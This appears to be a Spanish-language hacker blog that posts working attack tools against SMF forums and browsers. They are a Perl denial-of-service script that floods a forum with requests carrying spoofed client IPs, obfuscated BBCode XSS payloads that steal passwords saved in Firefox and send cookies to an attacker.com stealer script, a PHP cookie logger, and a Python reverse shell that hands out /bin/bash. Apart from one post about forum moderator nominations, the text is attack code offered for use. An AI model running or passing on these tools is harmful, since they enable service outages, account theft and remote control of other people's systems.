Posted on
8:47
by Xianur0
#!/usr/bin/perl
use IO::Socket;
# uxmal666@gmail.com
# By Xianur0
use HTTP::Request;
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11");
print "\n\x09\x09\x09\x09\x09\x09\x09SMF Killer By Xianur0!\n\n";
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $numero = $ARGV[3];
my $password = $ARGV[4] || die("\nUso: smf.pl [host] [Path] [usuario] [Numeros Registros] [password]\n");
$o=0;
$e=0;
$a=189;
$cookie = logear();
for($i=133;$i<=$numero;$i++) {
if($i>=255) {$i=0;$o++;}
if($o>=255) {$o=0;$e++;}
if($e>=255) {$e=0;$a++;}
if($a>=255) {die("No Mas IPs :)..");}
my $sock = new IO::Socket::INET ( PeerAddr => $host, PeerPort => 80, Proto => 'tcp', Timeout=>'1', );
if(!$sock) {print "No se Pudo Conectar a $host!\n"; } else {
$ip = $a.".".$e.".".$o.".".$i;
$paquete = "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
$i++;
$ip = $a.".".$e.".".$o.".".$i;
$paquete .= "HEAD $path HTTP/1.1\r\nHost: $host\r\nCLIENT-IP: $ip\nCookie: ".$cookie."\n\n";
print $sock $paquete;
print "\r\nEnviados $ip\r\n";
}}
sub logear() {
my $req = HTTP::Request->new(POST => "http://".$host."/".$path."?action=login2");
$req->content_type('application/x-www-form-urlencoded');
$req->header("CLIENT-IP" => "127.127.127.127");
$req->content("user=".$user."&passwrd=".$password."&cookielength=-1");
my $res = $ua->request($req);
$response = $res->as_string;
@headers = split("\n",$response);
foreach $h (@headers) {
@hs = split("Set-Cookie:",$h);
$cookie .= $hs[1];
}
if($cookie eq "") {
die "\n[!] No se Puede Encontrar la cookie :S\n";
} else { print "[-] Cookie Detectada: ".$cookie."\n";}
return $cookie;
}
tira un foro SMF en menos de un minuto :)
usuario: el usuario que crearon en el foro
password: la password de dicho usuario
Numero de Registros: la cantidad de mensajes que se enviaran en total (este numero se multiplica por 2 y sera el numero de paquetes que el servidor leera por ejemplo si quiero que el servidor se caiga durante mas o menos 1 hora, coloco 5000)
publicado! no hagane stupideses que yo no me hago responsable de nada simplemente les puse el ejemplo de la debilidad del SQL del SMF ante este tipo de situaciones...
Posted on
21:22
by Xianur0
Nominations are Open For Moderation on MITM Forum
Minimum Requirements:
* 15 Posts Content (no spam, no opinions, no content copy & paste)
* Knowledge of the area to moderate
* Time to Keep Your area orderly
More Information:
http://forum.mitm.cl/index.php?topic=874.0
Posted on
16:47
by Xianur0
Firefox & SMF Password Stealing By Xianur0
bbcode example:
[iurl=javascript:document.write(unescape('%3C%73%63%72%69%70%74%3E%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%61%63%61%6E%74%65%2E%63%6F%6D%2F%65%76%69%6C%70%6F%70%75%70%2E%68%74%6D%22%2C%22%45%76%69%6C%20%50%6F%70%75%70%22%2C%22%74%6F%6F%6C%62%61%72%3D%6E%6F%2C%20%6C%6F%63%61%74%69%6F%6E%3D%6E%6F%2C%20%64%69%72%65%63%74%6F%72%69%65%73%3D%6E%6F%2C%20%73%74%61%74%75%73%3D%6E%6F%2C%20%6D%65%6E%75%62%61%72%3D%6E%6F%2C%20%73%63%72%6F%6C%6C%62%61%72%73%3D%6E%6F%2C%20%72%65%73%69%7A%61%62%6C%65%3D%79%65%73%2C%20%77%69%64%74%68%3D%35%30%38%2C%20%68%65%69%67%68%74%3D%33%36%35%2C%20%74%6F%70%3D%38%35%2C%20%6C%65%66%74%3D%31%34%30%22%29%3B%3C%2F%73%63%72%69%70%74%3E')+"test");][img]http://.[/img]http://e-r00t.s0me.co.cc
evilpopup.htm example:
<script>
window.opener.location.href='?action=login';
function alertar() {alert("User: " + window.opener.document.frmLogin.user.value + "\nPassword: " + window.opener.document.frmLogin.passwrd.value + "\nHacked! jejeje");}setTimeout("alertar()", 3000);
</script>
uno mas basado en la misma ciencia y en la falla de seguridad de firefox con el manejo de passwords guardadas jejejeje :)...
Posted on
19:50
by Xianur0
#!/usr/bin/env python -u
# By Xianur0
# uxmal666@gmail.com
import sys, socket, os
if len(sys.argv) != 3:
print "[x] Uso: %s [host] [port]" % (sys.argv[0])
else:
host = str(sys.argv[1])
port = int(sys.argv[2])
handler = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
try:
if os.fork() > 0: os._exit(0)
except OSError, error:
print 'Error En Fork: %d (%s)' % (error.errno, error.strerror)
pid = os.fork()
if pid > 0:
print 'Fork No Valido!'
handler.connect((host, port))
print "\n[x] Advance Reverse Shell By Xianur0.... OK\n"
os.dup2(handler.fileno(), sys.stdin.fileno())
os.dup2(handler.fileno(), sys.stdout.fileno())
handler.sendall(('\n<-------------------------Advance Reverse Shell By Xianur0-------------------->\n'))
while handler.recv:
handler.sendall(('\n\nXianur0:~ '))
os.system('/bin/bash')
except:
print "[!] Error conectando"
Posted on
12:48
by Xianur0
Author: Xianur0
BBCode of the smf not filtered properly specified urls:[center][size=14pt][url=javascript:alert('xss')]Saltando Filtro
:D...[/url][/size]
[url=javascript:document.write(unescape(%3Cscript+src%3D%22http%3A%2F%2Fwww.attacker.com%2Fexploit.js%22%3E%3C%2Fscript%3E))][img]http://img508.imageshack.us/img508/6982/flmnetworkuserbar494abfyb2.png[/img][/center]Click on the image, run the javascript..
BBC Cookie Exploit:[center][size=14pt][url=][/url][/size]
[url=javascript:
document.write(unescape('%3C%69%66%72%61%6D%65%20%77%69%64%74%68%3D%22%30%25%22%20%68%65%69%67%68%74%3D%22%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%61%74%74%61%63%6B%65%72%2E%63%6F%6D%2F%63%6F%6F%6B%69%65%73%74%65%61%6C%65%72%2E%70%68%70%3F%63%6F%6F%6B%69%65%3D%27%20%2B%20%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%20%2B%20%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%25%22%3E'));][img]http://www.google.com.mx/intl/es_mx/images/logo.gif[/img][/center]
<?php
$cookie = $_GET['cookie'];
$handler = fopen('cookies.txt', 'a');
fwrite($handler, $cookie."\n");
?>
